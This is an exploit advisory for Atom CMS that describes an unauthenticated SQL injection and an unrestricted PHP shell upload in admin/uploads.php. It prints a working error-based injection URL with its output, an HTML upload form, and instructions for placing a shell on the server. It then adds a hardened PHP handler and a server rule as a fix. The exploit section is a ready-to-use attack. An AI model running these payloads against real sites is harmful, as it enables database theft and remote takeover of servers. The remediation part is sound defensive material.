Atom CMS Shell Upload / SQL Injection

Date: 07 Jul 2014
Reported by: Jagriti Sahu
Type: packetstorm
Source: packetstormsecurity.com

Atom CMS SQL Injection and file upload vulnerability discovered in 201

Code

```text
##################################################################################################
#Exploit Title : Atom CMS SQL Injection and file upload vulnerability
#Author : Jagriti Sahu
#Vendor : https://github.com/thedigicraft/Atom.CMS
#Date : 07/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
Atom CMS suffers from a remote SQL injection and a PHP shell
upload vulnerability.
Both vulnerabilities are high risk: the SQL injection exposes data
stored in the database, whereas the unrestricted file upload allows a PHP shell
to be placed on the server.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is in the /admin/uploads.php file, which performs no
check on who is accessing it (the file is intended for the admin user only, but a guest
user can also access it).
The parameter $_GET['id'] is not filtered before its data is supplied
to SQL queries, which gives rise to the SQL injection,
and the avatar image upload code does not check whether the file is an image
or some other kind of file, which leads to the PHP shell upload.


///////////////////////
/// exploit code ////
///////////////////////


SQL injection exploitation
==========================

http://127.0.0.1/acms/admin/uploads.php?id=1 and(select 1 FROM(select
count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

In the result you will get the database name in the last line of the message on the
page:

UPDATE users SET avatar = '1404709440490.' WHERE id = 1 and(select 1
FROM(select count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Duplicate entry 'acms1' for key 'group_key'


File upload exploitation
==========================


<form action="http://127.0.0.1/atom_cms/admin/uploads.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="exploit">
</form>


Save this code on your machine as exploit.html,
open it with a web browser,
browse to your shell and click the "exploit" button.
The shell will be under the directory

http://127.0.0.1/atom_cms/uploads/

/////////////////////
end of exploit code
////////////////////
```
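The three defects the advisory describes (no access check on the handler, an unfiltered `id` reaching the query, and no image validation on the avatar upload) map to three fixes. The following is an added example of a hardened handler written for this page, not Atom CMS's own code; the session key `is_admin`, the `users`/`avatar`/`id` names, the upload directory and the database credentials are assumptions.

```php
<?php
// Added example (not Atom CMS code): a hardened sketch of an admin avatar-upload
// handler covering the three defects from the advisory.
declare(strict_types=1);
session_start();

// 1. Authorisation: the advisory notes uploads.php never checked who called it.
//    'is_admin' is an assumed session flag set by the login code.
if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. The id parameter is validated as an integer and bound as a parameter,
//    never concatenated into the UPDATE statement.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('bad id');
}

// 3. Upload validation: upload status, size, server-detected MIME type,
//    and a fixed extension allowlist. The client-supplied name is discarded.
$allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
    || $_FILES['file']['size'] > 2 * 1024 * 1024) {
    http_response_code(400);
    exit('bad upload');
}
$tmp  = $_FILES['file']['tmp_name'];
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
if (!isset($allowed[$mime]) || getimagesize($tmp) === false) {
    http_response_code(400);
    exit('not an image');
}
$name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
$dest = __DIR__ . '/../uploads/' . $name;   // assumed directory; serve it with PHP execution disabled
if (!move_uploaded_file($tmp, $dest)) {
    http_response_code(500);
    exit('store failed');
}

// Errors become exceptions handled generically, so no SQL error text (which the
// error-based injection above relied on) is echoed to the page.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=acms', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$stmt = $pdo->prepare('UPDATE users SET avatar = :avatar WHERE id = :id');
$stmt->execute([':avatar' => $name, ':id' => $id]);
echo 'ok';
```

Pair this with a web-server rule that refuses to execute scripts from the uploads directory, so that even a validation bypass yields a static file rather than a shell.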
